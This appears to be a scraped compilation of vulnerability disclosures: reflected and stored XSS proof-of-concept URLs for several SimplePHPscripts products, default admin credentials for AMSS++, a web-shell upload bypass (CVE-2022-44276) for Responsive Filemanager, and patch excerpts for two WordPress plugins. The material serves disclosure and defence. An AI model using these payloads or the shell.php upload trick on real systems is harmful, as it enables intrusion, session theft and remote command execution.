News Script Pro version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/news-script-php-pro/                          ││  Vendor   : SimplePHPscripts                                                           ││  Software : News Script Pro is 2.4                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/mn71q"><script>alert(1)</script>p15vr?cat_id=&p=2Path: /preview.phphttps://website/preview.php?id=467&p=2&search=&SysMessage=ahw5l%3Cscript%3Ealert(1)%3C/script%3Eulvrb[-] Done

News Script Pro 2.4 Cross Site Scripting

Funeral Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/funeral-script-php/                           ││  Vendor   : SimplePHPscripts                                                           ││  Software : Funeral Script 3.1                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/a8udq"><script>alert(1)</script>zl141?id=11&p=&search=&SysMessage=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=&search=&SysMessage=phl3z%3cscript%3ealert(1)%3c%2fscript%3ea504dPath: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=y26tx%22%3e%3cscript%3ealert(1)%3c%2fscript%3ellgzs&search=&SysMessage=[-] Done

Funeral Script 3.1 Cross Site Scripting

FAQ Script version 2.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/faq-script-php/                               ││  Vendor   : SimplePHPscripts                                                           ││  Software : FAQ Script 2.3                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/hov24"><script>alert(1)</script>mcpji?act=faq&cat_id=1&search=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?act=new&SysMessage=c513c%3cscript%3ealert(1)%3c%2fscript%3eujbsi[-] Done

FAQ Script 2.3 Cross Site Scripting

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

AMSS++ 2.0 Insecure Settings

Event Script version 2.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/event-script-php/                             ││  Vendor   : SimplePHPscripts                                                           ││  Software : Event Script 2.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/ekhfb"><script>alert(1)</script>cg9xj?search=123Path: /preview.phpGET 'message' parameter is vulnerable to RXSShttps://website/preview.php?message=fy3sr<script>alert(1)</script>aqblo[-] Done

Event Script 2.1 Cross Site Scripting

Classified Ads Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/classified-ads-script-php/                    ││  Vendor   : SimplePHPscripts                                                           ││  Software : Classified Ads Script 1.8                                                  ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search=Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search=## Stored XSS-----------------------------------------------POST /classified-ads-script-php/classifiedscript/user.php HTTP/2Content-Disposition: form-data; name="title"<script>alert(1)</script>-----------------------------------------------POST parameter 'title' is vulnerable to XSS## Steps to Reproduce:1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds)2. Inject your [XSS Payload] in "Enter Title"3. Save4. XSS Fired on Local User Browser5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads)6. XSS Will Fire and Executed on his Browser [-] Done

Classified Ads Script 1.8 Cross Site Scripting

GuestBook Script version 2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/guestbook-script-php/                         ││  Vendor   : SimplePHPscripts                                                           ││  Software : GuestBook Script 2.2                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=newPath: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x[-] Done

GuestBook Script 2.2 Cross Site Scripting

In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE.

**CVE-2022-44276-PoC**

PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE

**Where's vuln?**

When uploading new file we go through function fix_filename: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/upload.php#L112

In this function we have function strip_tags which searches brackets and removes them: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/include/utils.php#L581

So, we can send file with filename lick shell.php<.txt, which will be renamed to shell.php due to function strip_tags.

But, there's additional check of file type by it's content: https://github.com/trippo/ResponsiveFilemanager/blob/9a7411f3eab3b7d8e2c78dcf40b4325bde2c548d/filemanager/upload.php#L101

So, we cannot upload classic php shell <?php system($_GET['c']);?>. But, we can do a little trick: function get_extension_from_mime works based on first several chars of file. So, if we start our payload with several 'a' chars, it can be detected with txt type.

**How to exploit**

1.  Intercept upload request with burp suite
2.  Change filename to shell.php<.txt 
3.  go to url/source/shell.php?c=<your\_command>

CVE-2022-44276: GitHub - HerrLeStrate/CVE-2022-44276-PoC: PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE

The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.

1<?php2if ( ! function\_exists( 'add\_action' ) ) {3        exit();4}56global $current\_user;78$s2\_admin \= ! empty( $\_POST\['s2\_admin'\] ) ? sanitize\_key( $\_POST\['s2\_admin'\] ) : '';910// was anything POSTed?11if ( 'mail' \=== $s2\_admin ) {12        if ( ! current\_user\_can( 'manage\_options' ) ) {13                die( '<p>' . esc\_html\_\_( 'Security error! You are not able to send email.', 'subscribe2' ) . '</p>' );14        }1516        if ( ! isset( $\_REQUEST\['\_wpnonce'\] ) || ! wp\_verify\_nonce( sanitize\_key( $\_REQUEST\['\_wpnonce'\] ), 'subscribe2-write\_subscribers' . S2VERSION ) ) {17                die( '<p>' . esc\_html\_\_( 'Security error! Your request cannot be completed.', 'subscribe2' ) . '</p>' );18        }1920        $subject \= html\_entity\_decode( stripslashes( wp\_kses( $this\->substitute( $\_POST\['subject'\] ), '' ) ), ENT\_QUOTES );21        $body    \= wpautop( $this\->substitute( stripslashes( $\_POST\['content'\] ) ), true );22        if ( '' !== $current\_user\->display\_name || '' !== $current\_user\->user\_email ) {23                $this\->myname  \= html\_entity\_decode( $current\_user\->display\_name, ENT\_QUOTES );24                $this\->myemail \= $current\_user\->user\_email;25        }26        if ( isset( $\_POST\['send'\] ) ) {27                if ( 'confirmed' \=== $\_POST\['what'\] ) {28                        $recipients \= $this\->get\_public();29                } elseif ( 'unconfirmed' \=== $\_POST\['what'\] ) {30                        $recipients \= $this\->get\_public( 0 );31                } elseif ( 'public' \=== $\_POST\['what'\] ) {32                        $confirmed   \= $this\->get\_public();33                        $unconfirmed \= $this\->get\_public( 0 );34                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed );35                } elseif ( is\_numeric( $\_POST\['what'\] ) ) {36                        $category   \= intval( $\_POST\['what'\] );37                        $recipients \= $this\->get\_registered( "cats=$category" );38                } elseif ( 'all\_users' \=== $\_POST\['what'\] ) {39                        $recipients \= $this\->get\_all\_registered();40                } elseif ( 'all' \=== $\_POST\['what'\] ) {41                        $confirmed   \= $this\->get\_public();42                        $unconfirmed \= $this\->get\_public( 0 );43                        $registered  \= $this\->get\_all\_registered();44                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed, (array) $registered );45                } else {46                        $recipients \= $this\->get\_registered();47                }48        } elseif ( isset( $\_POST\['preview'\] ) ) {49                global $user\_email;50                $recipients\[\] \= $user\_email;51        }5253        $uploads \= array();54        if ( ! empty( $\_FILES ) ) {55                foreach ( $\_FILES\['file'\]\['name'\] as $key \=> $value ) {56                        if ( 0 \=== $\_FILES\['file'\]\['error'\]\[ $key \] ) {57                                $file \= array(58                                        'name'     \=> $\_FILES\['file'\]\['name'\]\[ $key \],59                                        'type'     \=> $\_FILES\['file'\]\['type'\]\[ $key \],60                                        'tmp\_name' \=> $\_FILES\['file'\]\['tmp\_name'\]\[ $key \],61                                        'error'    \=> $\_FILES\['file'\]\['error'\]\[ $key \],62                                        'size'     \=> $\_FILES\['file'\]\['size'\]\[ $key \],63                                );6465                                $uploads\[\] \= wp\_handle\_upload(66                                        $file,67                                        array(68                                                'test\_form' \=> false,69                                        )70                                );71                        }72                }73        }74        $attachments \= array();75        if ( ! empty( $uploads ) ) {76                foreach ( $uploads as $upload ) {77                        if ( ! isset( $upload\['error'\] ) ) {78                                $attachments\[\] \= $upload\['file'\];79                        } else {80                                $upload\_error \= $upload\['error'\];81                        }82                }83        }8485        if ( empty( $body ) ) {86                $error\_message \= \_\_( 'Your email was empty', 'subscribe2' );87                $success       \= false;88        } elseif ( isset( $upload\_error ) ) {89                $error\_message \= $upload\_error;90                $success       \= false;91        } else {92                $success       \= $this\->mail( $recipients, $subject, $body, 'html', $attachments );93                $error\_message \= \_\_( 'Check your settings and check with your hosting provider', 'subscribe2' );94        }9596        if ( $success ) {97                if ( isset( $\_POST\['preview'\] ) ) {98                        $message \= '<p class="s2\_message">' . \_\_( 'Preview message sent!', 'subscribe2' ) . '</p>';99                } elseif ( isset( $\_POST\['send'\] ) ) {100                        $message \= '<p class="s2\_message">' . \_\_( 'Message sent!', 'subscribe2' ) . '</p>';101                }102        } else {103                global $phpmailer;104105                $mailer\_error \= ! empty( $phpmailer\->ErrorInfo ) ? $phpmailer\->ErrorInfo : '';106                $message      \= '<p class="s2\_error">' . \_\_( 'Message failed!', 'subscribe2' ) . '</p>' . $error\_message . $mailer\_error;107        }108109        echo '<div id="message" class="' . ( $success ? 'updated' : 'error' ) . '"><strong><p>' . wp\_kses\_post( $message ) . '</p></strong></div>' . "\\r\\n";110}111112// show our form113echo '<div class="wrap">';114echo '<h1>' . esc\_html\_\_( 'Send an email to subscribers', 'subscribe2' ) . '</h1>' . "\\r\\n";115echo '<form method="post" enctype="multipart/form-data">' . "\\r\\n";116117wp\_nonce\_field( 'subscribe2-write\_subscribers' . S2VERSION );118119$body \= ! empty( $\_POST\['content'\] ) ? esc\_textarea( $\_POST\['content'\] ) : '';120if ( isset( $\_POST\['subject'\] ) ) {121        $subject \= stripslashes( esc\_html( $\_POST\['subject'\] ) );122} else {123        $subject \= \_\_( 'A message from', 'subscribe2' ) . ' ' . html\_entity\_decode( get\_option( 'blogname' ), ENT\_QUOTES );124}125126echo '<p>' . esc\_html\_\_( 'Subject', 'subscribe2' ) . ': <input type="text" size="69" name="subject" value="' . esc\_attr( $subject ) . '" /> <br><br>';127echo '<textarea rows="12" cols="75" name="content">' . $body . '</textarea>';128echo "<br><div id=\\"upload\_files\\"\><input type=\\"file\\" name=\\"file\[\]\\" onChange=\\"remove\_selected\_image()\\"\></div>\\r\\n";129echo '<input type="button" class="button-secondary" name="addmore" value="' . esc\_attr( \_\_( 'Add More Files', 'subscribe2' ) ) . "\\" onClick=\\"add\_file\_upload();\\" />\\r\\n";130echo "<br><br>\\r\\n";131echo esc\_html\_\_( 'Recipients:', 'subscribe2' ) . ' ';132$this\->display\_subscriber\_dropdown( apply\_filters( 's2\_subscriber\_dropdown\_default', 'registered' ), false );133echo '<input type="hidden" name="s2\_admin" value="mail" />';134echo '<p class="submit"><input type="submit" class="button-secondary" name="preview" value="' . esc\_attr( \_\_( 'Preview', 'subscribe2' ) ) . '" />&nbsp;<input type="submit" class="button-primary" name="send" value="' . esc\_attr( \_\_( 'Send', 'subscribe2' ) ) . '" /></p>';135echo '</form></div>' . "\\r\\n";136echo '<div style="clear: both;"><p>&nbsp;</p></div>';137?>138<script type="text/javascript">139    //<!\[CDATA\[140    function add\_file\_upload() {141        const fileUploadContainer = document.getElementById('upload\_files'),142            fileNode = document.createElement('input'),143            spanNode = document.createElement('span'),144            lineBreak = document.createElement('br');145146        // Insert multiple file.147        if (!Boolean(fileNode.value)) {148            fileNode.type = 'file';149            fileNode.name = 'file\[\]';150            spanNode.classList.add('dashicons', 'dashicons-no-alt');151            spanNode.style.marginTop = '4px';152153            fileUploadContainer.appendChild(lineBreak);154            fileUploadContainer.appendChild(fileNode);155            fileUploadContainer.appendChild(spanNode);156        }157158        // Remove uploaded image if selected otherwise remove field.159        spanNode.addEventListener('click', function () {160            if (Boolean(fileNode.value)) {161                fileNode.value = '';162                return;163            }164165            fileNode.remove();166            spanNode.remove();167            lineBreak.remove();168        });169    }170171    // Handle first selected image.172    function remove\_selected\_image() {173        const fileUploadContainer = document.getElementById('upload\_files'),174            firstFile = fileUploadContainer.getElementsByTagName('input')\[0\],175            spanNode = document.createElement('span');176177        if (!Boolean(firstFile.nextSibling)) {178            spanNode.style.marginTop = '4px';179            spanNode.classList.add('dashicons', 'dashicons-no-alt');180            firstFile.after(spanNode);181        }182183        spanNode.addEventListener('click', function () {184            firstFile.value = '';185            this.remove();186        });187    }188    //\]\]>189</script>190<?php191require ABSPATH . 'wp-admin/admin-footer.php';192// just to be sure193die;

CVE-2023-1844: send-email.php in subscribe2/trunk/admin – WordPress Plugin Repository

The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

06/27/2023 11:32:24 AM (15 hours ago)

wordpresschef

Message:

Update trunk - version 8.4.8  

Location:

salon-booking-system/trunk

Files:

  

*   readme.txt (2 diffs)
*   salon.php (2 diffs)
*   src/SLN/Admin/Customers.php (1 diff)
*   views/admin/\_customer.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **salon-booking-system/trunk/readme.txt**
    
    r2931279
    
    r2931406
    
     
    
    5
    
    5
    
    Tested up to: 6.1
    
    6
    
    6
    
    Requires PHP: 7.4.8
    
    7
    
     
    
    Stable tag: 8.4.7
    
     
    
    7
    
    Stable tag: 8.4.8
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    344
    
    344
    
    \== Changelog ==
    
    345
    
    345
    
     
    
    346
    
    27.06.2023
    
     
    
    347
    
     
    
    348
    
    \* Fix vulnerability issue
    
     
    
    349
    
    346
    
    350
    
    23.06.2023
    
    347
    
    351
    
*   **salon-booking-system/trunk/salon.php**
    
    r2931279
    
    r2931406
    
     
    
    4
    
    4
    
    Plugin Name: Salon Booking Wordpress Plugin - Free Version
    
    5
    
    5
    
    Description: Let your customers book you services through your website. Perfect for hairdressing salons, barber shops and beauty centers.
    
    6
    
     
    
    Version: 8.4.7
    
     
    
    6
    
    Version: 8.4.8
    
    7
    
    7
    
    Plugin URI: http://salonbookingsystem.com/
    
    8
    
    8
    
    Author: Salon Booking System
    
    …
    
    …
    
     
    
    42
    
    42
    
    define('SLN\_PLUGIN\_DIR', untrailingslashit(dirname(\_\_FILE\_\_)));
    
    43
    
    43
    
    define('SLN\_PLUGIN\_URL', untrailingslashit(plugins\_url('', \_\_FILE\_\_)));
    
    44
    
     
    
    define('SLN\_VERSION', '8.4.6');
    
     
    
    44
    
    define('SLN\_VERSION', '8.4.8');
    
    45
    
    45
    
    define('SLN\_STORE\_URL', 'https://salonbookingsystem.com');
    
    46
    
    46
    
    define('SLN\_AUTHOR', 'Salon Booking');
    
*   **salon-booking-system/trunk/src/SLN/Admin/Customers.php**
    
    r2779160
    
    r2931406
    
     
    
    67
    
    67
    
    68
    
    68
    
        private function save\_customer($user\_id) {
    
     
    
    69
    
            check\_admin\_referer('sln\_update\_user\_'.$user\_id);
    
    69
    
    70
    
            $customer = \[\];
    
    70
    
    71
    
            $email = isset($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ? sanitize\_email( wp\_unslash($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ) : false;
    
*   **salon-booking-system/trunk/views/admin/\_customer.php**
    
    r2920616
    
    r2931406
    
     
    
    28
    
    28
    
    29
    
    29
    
            <input type="hidden" name="id" id="id" value="<?php echo $customer->getId(); ?>">
    
     
    
    30
    
            <?php wp\_nonce\_field('sln\_update\_user\_'. ($customer->isEmpty() ? 0 : $customer->getId())); ?>
    
    30
    
    31
    
                <div class="sln-box sln-box--main">
    
    31
    
    32
    
                    <div class="row">
    

**Note:** See TracChangeset for help on using the changeset viewer.

Tag

#php